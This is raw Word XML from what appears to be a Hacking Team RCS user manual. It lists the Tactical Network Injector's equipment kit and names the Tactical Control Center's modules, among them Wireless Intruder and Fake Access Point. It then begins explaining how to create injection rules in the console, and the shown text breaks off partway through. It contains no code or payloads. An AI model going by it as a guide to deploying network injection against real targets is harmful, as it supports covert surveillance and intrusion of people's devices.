          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Tactical Network Injector is fully provided by Hacking Team with a specific set of equipment, listed below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004805E8" w:rsidRDefault="004805E8" w:rsidP="00F75689">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia5scura-colore1"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="694"/>
        <w:gridCol w:w="978"/>
        <w:gridCol w:w="3489"/>
        <w:gridCol w:w="4467"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D5BA1" w:rsidTr="00D66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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D6693D" w:rsidRDefault="00D6693D" w:rsidP="00DA7E05">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D6693D" w:rsidRDefault="00AD2987" w:rsidP="00DA7E05">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251858944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="438B883C" wp14:editId="5AF64D46">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="margin">
                    <wp:posOffset>366395</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="margin">
                    <wp:posOffset>926465</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2063750" cy="1943100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>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1560-peli-case.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063750" cy="1943100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="margin">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="margin">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r w:rsidR="009D5BA1">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251862016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35FF4A5A" wp14:editId="1DD422F5">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>593090</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>3141980</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1708785" cy="495300"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>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Logo_Galileo_Scritta.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708785" cy="495300"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="margin">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="margin">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w: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01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:gridSpan w:val="2"/>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DVD RCS Network Injector</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02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:gridSpan w:val="2"/>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Notebook (Dell E6330)</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03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:gridSpan w:val="2"/>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Battery 30 Wh (Dell)</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04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:gridSpan w:val="2"/>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Battery 60 Wh (Dell)</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05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:gridSpan w:val="2"/>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Battery 97 Wh (Dell)</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06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:gridSpan w:val="2"/>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Car + plain chargers (Dell)</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07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:gridSpan w:val="2"/>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Network card RJ45 external</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08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:gridSpan w:val="2"/>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Network card Wi-Fi external</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09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:gridSpan w:val="2"/>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Network card Wi-Fi internal (replacement)</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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:gridSpan w:val="2"/>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USB extension cable 1 Mt</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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:gridSpan w:val="2"/>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USB extension cable 3 Mt</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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:gridSpan w:val="2"/>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International power adapter</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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="508" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D6693D" w:rsidRDefault="00D6693D" w:rsidP="00DA7E05">
            <w:pPr>
              <w:spacing w:before="80" w:after="8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B</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D6693D" w:rsidRDefault="00D6693D" w:rsidP="00DA7E05">
            <w:pPr>
              <w:spacing w:before="80" w:after="8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A</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D6693D" w:rsidRDefault="00D6693D" w:rsidP="00DA7E05">
            <w:pPr>
              <w:spacing w:before="80" w:after="8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G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="pct"/>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Rugged bag</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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="508" w:type="pct"/>
            <w:vMerge/>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c>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="pct"/>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Shoulder belt</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r w:rsidR="009D5BA1" w:rsidTr="00D6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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="508" w:type="pct"/>
            <w:vMerge/>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c>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="pct"/>
            <w:vAlign w:val="center"/>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r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Internal sponge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00D6693D" w:rsidRDefault="00D6693D" w:rsidP="00DA7E05">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D5BA1" w:rsidTr="00D6693D">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="360" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D6693D" w:rsidRDefault="00D6693D" w:rsidP="00DA7E05">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="508" w:type="pct"/>
            <w:vMerge/>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c>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="pct"/>
            <w:vAlign w:val="center"/>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r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Internal pocket briefcase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2320" w:type="pct"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00D6693D" w:rsidRDefault="00D6693D" w:rsidP="00DA7E05">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004805E8" w:rsidRPr="006954F7" w:rsidRDefault="004805E8" w:rsidP="00F75689">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D91989" w:rsidRDefault="00D91989">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91989" w:rsidRPr="000752EB" w:rsidRDefault="00D91989" w:rsidP="00D91989">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc372642499"/>
      <w:r w:rsidRPr="000752EB">
        <w:lastRenderedPageBreak/>
        <w:t>Tactical Control Center Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00D91989" w:rsidRDefault="00D91989" w:rsidP="00D91989">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D91989" w:rsidRDefault="0071027D" w:rsidP="00D91989">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Tactical Network Injector </w:t>
      </w:r>
      <w:r w:rsidR="00FA1D58">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">software </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>runs on a modified Ubuntu Linux distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071027D" w:rsidRDefault="0071027D" w:rsidP="00D91989">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When the system starts you have to identify and run the Tactical Control Center application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071027D" w:rsidRDefault="0071027D" w:rsidP="00D91989">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0071027D" w:rsidRDefault="0071027D" w:rsidP="00D91989">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Tactical Control Center is composed of 4 internal sections: Network Injector, Wireless Intruder, Fake Access Point and Log System.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00370DC9" w:rsidRDefault="00370DC9" w:rsidP="00D91989">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00370DC9" w:rsidRDefault="001E69F5" w:rsidP="00D91989">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6120130" cy="4589780"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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actical Network Injector 9.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId206">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="4589780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071027D" w:rsidRPr="002D7F2D" w:rsidRDefault="0071027D" w:rsidP="0071027D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0071027D" w:rsidRPr="002D7F2D" w:rsidRDefault="0010013A" w:rsidP="0071027D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6.3</w:t>
      </w:r>
      <w:r w:rsidR="0071027D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="0071027D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tactical Control Center</w:t>
      </w:r>
      <w:r w:rsidR="0071027D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] </w:t>
      </w:r>
      <w:r w:rsidR="0071027D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network Injector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA1D58" w:rsidRPr="00FA1D58" w:rsidRDefault="00FA1D58" w:rsidP="00F75689">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006954F7" w:rsidRDefault="006954F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC7C23" w:rsidRDefault="00FC7C23" w:rsidP="00C87FEC">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc372642500"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Rules Creation and Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="00FC7C23" w:rsidRDefault="00FC7C23" w:rsidP="00FC7C23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00732043" w:rsidRDefault="00732043" w:rsidP="00FC7C23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Once completed the Tactical Network Injector installation and configuration, it’s possible to proceed with rules creation</w:t>
      </w:r>
      <w:r w:rsidR="00FA1D58">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, by clicking on the button Add a new rule.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00171249" w:rsidRDefault="00171249" w:rsidP="00FC7C23">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3"/>
        <w:gridCol w:w="5082"/>
      </w:tblGrid>
      <w:tr w:rsidR="00171249" w:rsidTr="00E62E16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00171249" w:rsidRDefault="003A4380" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1339" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:202.5pt;height:217.5pt;z-index:251860992;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId207" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1339" DrawAspect="Content" ObjectID="_1446455373" r:id="rId208"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRDefault="0010013A" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6.4</w:t>
            </w:r>
            <w:r w:rsidR="00171249" w:rsidRPr="002D7F2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> [ RCS Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00171249">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>System &gt; Network Injectors</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00A52C9B" w:rsidRDefault="00171249" w:rsidP="00171249">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00171249">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Network Injector #</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; Add a new rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5082" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="006364C1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="006364C1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidR="006364C1" w:rsidRPr="006364C1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>f selected, the rule will be sent to the Network Injector</w:t>
            </w:r>
            <w:r w:rsidR="006364C1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> and activated. </w:t>
            </w:r>
            <w:r w:rsidR="006364C1" w:rsidRPr="006364C1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>If not selected</w:t>
            </w:r>
            <w:r w:rsidR="006364C1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="006364C1" w:rsidRPr="006364C1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>the rule is saved but not sent.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="006364C1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Disable on sync</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00AF6B3B">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidR="006364C1" w:rsidRPr="006364C1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>f selected, the rule is disabled after the first synch</w:t>
            </w:r>
            <w:r w:rsidR="006364C1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ronization of the </w:t>
            </w:r>
            <w:r w:rsidR="00AF6B3B">
              <w:rPr>
